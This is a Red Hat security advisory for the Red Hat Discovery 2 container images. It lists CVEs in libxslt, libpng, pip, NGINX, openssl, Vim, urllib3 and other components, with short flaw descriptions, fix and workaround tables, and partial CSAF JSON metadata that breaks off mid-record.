| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Workaround
|
A use-after-free vulnerability was found in libxslt while parsing xsl nodes that may lead to the dereference of expired pointers and application crash.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — | ||
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
A flaw was found in libtasn1. A remote attacker could exploit a stack-based buffer overflow vulnerability in the `asn1_expend_octet_string` function. This occurs due to a failure in validating the size of input data. Successful exploitation can lead to a Denial of Service (DoS) condition, making the affected system or application unavailable.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in image-size. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by supplying specially crafted JXL, HEIF, or JP2 image files that contain zero-sized boxes. The `findBox` function, responsible for image validation, enters an infinite loop when processing these malicious files, leading to an application hang. This can disrupt the availability of services relying on the image-size component.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Workaround
|
A flaw was found in pip, the package installer for Python. A remote attacker can exploit this vulnerability by tricking a victim into installing a malicious Python wheel. This wheel contains specially crafted entry-point names that use directory traversal or absolute paths. This allows pip to write generated script wrappers outside the intended installation directory, leading to arbitrary file overwrite. This can severely impact system integrity and availability, and in certain scenarios, may lead to arbitrary code execution.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Workaround
|
A flaw was found in the ngx_http_rewrite_module module of NGINX. When a rewrite directive uses a regex pattern with distinct, overlapping Perl-Compatible Regular Expression (PCRE) captures and a replacement string that references multiple such captures in a redirect or arguments context, an unauthenticated attacker can send crafted HTTP requests and cause a heap-based buffer overflow in the worker process, potentially allowing code execution or a denial of service by forcing the process to restart.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Workaround
|
A flaw was found in openssl. Applications that use RSASVE key encapsulation, a method for securely exchanging encryption keys, may inadvertently expose sensitive data. This vulnerability arises when an application processes a malicious, invalid RSA public key provided by an attacker without proper validation. Consequently, the application might send the contents of an uninitialized memory buffer, which could contain confidential information, to the attacker.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libpng, a library used for processing PNG (Portable Network Graphics) image files. This vulnerability arises from improper memory management where a heap-allocated buffer is aliased between internal data structures. When specific functions are called, a freed memory region can still be referenced, leading to a use-after-free condition. An attacker could potentially exploit this to achieve arbitrary code execution or cause a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Workaround
|
A flaw was found in libpng. A remote attacker could exploit an out-of-bounds read and write vulnerability in the ARM/AArch64 Neon-optimized palette expansion path. This occurs when processing a final partial chunk of 8-bit paletted rows without verifying sufficient input pixels, leading to dereferencing pointers before the start of the row buffer and writing expanded pixel data to underflowed positions. This flaw can result in information disclosure and denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Workaround
|
A flaw was found in Vim, an open-source command-line text editor. This command injection vulnerability occurs during tag file processing. A local user could craft a malicious tags file containing backtick syntax in the filename field. When Vim resolves a tag from this file, it executes the embedded command via the system shell, leading to arbitrary code execution with the privileges of the running user.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
Workaround
|
A flaw was found in urllib3, an HTTP client library for Python. When using the low-level API via `ProxyManager.connection_from_url().urlopen()` with `assert_same_host=False`, cross-origin redirects can still forward sensitive headers. This could allow a remote attacker to gain unauthorized access to sensitive information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — | ||
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
A flaw was found in urllib3, an HTTP client library for Python. This vulnerability allows a remote attacker to cause excessive resource consumption, such as high CPU usage and massive memory allocation, on the client side. This occurs when urllib3 attempts to decompress an entire HTTP response, even if only a partial read was requested, or when draining the connection after a partial decompression. This can lead to a Denial of Service (DoS) condition.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 | — | ||
| Unresolved product id: Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 | — |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A Subscription Management tool for finding and reporting Red Hat product usage",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Discovery, also known as Discovery, is an inspection and reporting tool that finds,\nidentifies, and reports environment data, or facts, such as the number of physical and virtual\nsystems on a network, their operating systems, and relevant configuration data stored within\nthem. Discovery also identifies and reports more detailed facts for some versions of key\nRed Hat packages and products that it finds in the network.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:33313",
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2024-34459",
"url": "https://access.redhat.com/security/cve/CVE-2024-34459"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-10911",
"url": "https://access.redhat.com/security/cve/CVE-2025-10911"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13151",
"url": "https://access.redhat.com/security/cve/CVE-2025-13151"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-5278",
"url": "https://access.redhat.com/security/cve/CVE-2025-5278"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-71319",
"url": "https://access.redhat.com/security/cve/CVE-2025-71319"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-31790",
"url": "https://access.redhat.com/security/cve/CVE-2026-31790"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33416",
"url": "https://access.redhat.com/security/cve/CVE-2026-33416"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33636",
"url": "https://access.redhat.com/security/cve/CVE-2026-33636"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-41411",
"url": "https://access.redhat.com/security/cve/CVE-2026-41411"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44431",
"url": "https://access.redhat.com/security/cve/CVE-2026-44431"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44432",
"url": "https://access.redhat.com/security/cve/CVE-2026-44432"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-8643",
"url": "https://access.redhat.com/security/cve/CVE-2026-8643"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-9256",
"url": "https://access.redhat.com/security/cve/CVE-2026-9256"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/subscription_central/1-latest/#Discovery",
"url": "https://docs.redhat.com/en/documentation/subscription_central/1-latest/#Discovery"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_33313.json"
}
],
"title": "Red Hat Security Advisory: A Subscription Management tool for finding and reporting Red Hat product usage",
"tracking": {
"current_release_date": "2026-07-10T16:14:53+00:00",
"generator": {
"date": "2026-07-10T16:14:53+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.2"
}
},
"id": "RHSA-2026:33313",
"initial_release_date": "2026-06-29T22:05:31+00:00",
"revision_history": [
{
"date": "2026-06-29T22:05:31+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-29T22:05:34+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-07-10T16:14:53+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Discovery 2",
"product": {
"name": "Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:discovery:2::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Discovery"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"product": {
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"product_id": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-server-rhel9@sha256%3A7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66?arch=amd64\u0026repository_url=registry.redhat.io/discovery/discovery-server-rhel9\u0026tag=1782763840"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64",
"product": {
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64",
"product_id": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-ui-rhel9@sha256%3Ae9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70?arch=amd64\u0026repository_url=registry.redhat.io/discovery/discovery-ui-rhel9\u0026tag=1782756541"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"product": {
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"product_id": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-server-rhel9@sha256%3A6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d?arch=arm64\u0026repository_url=registry.redhat.io/discovery/discovery-server-rhel9\u0026tag=1782763840"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"product": {
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"product_id": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-ui-rhel9@sha256%3A3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44?arch=arm64\u0026repository_url=registry.redhat.io/discovery/discovery-ui-rhel9\u0026tag=1782756541"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64 as a component of Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64"
},
"product_reference": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"relates_to_product_reference": "Red Hat Discovery 2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64 as a component of Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
},
"product_reference": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"relates_to_product_reference": "Red Hat Discovery 2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64 as a component of Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64"
},
"product_reference": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"relates_to_product_reference": "Red Hat Discovery 2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64 as a component of Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
},
"product_reference": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64",
"relates_to_product_reference": "Red Hat Discovery 2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-34459",
"cwe": {
"id": "CWE-126",
"name": "Buffer Over-read"
},
"discovery_date": "2024-05-14T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2280532"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the xmllint program distributed by the libxml2 package. A buffer over-read in the xmlHTMLPrintFileContext function in the xmllint.c file may be triggered when a crafted file is processed with the xmllint program using the `--htmlout` command line option, causing an application crash and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libxml2: buffer over-read in xmlHTMLPrintFileContext in xmllint.c",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects the xmllint program when the `--htmlout\u0027 command line option is used. Additionally, an application is not vulnerable if it does not use or expose the xmllint program.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34459"
},
{
"category": "external",
"summary": "RHBZ#2280532",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280532"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34459"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34459",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34459"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/720",
"url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/720"
}
],
"release_date": "2024-05-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "Do not process untrusted files with the xmllint program.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
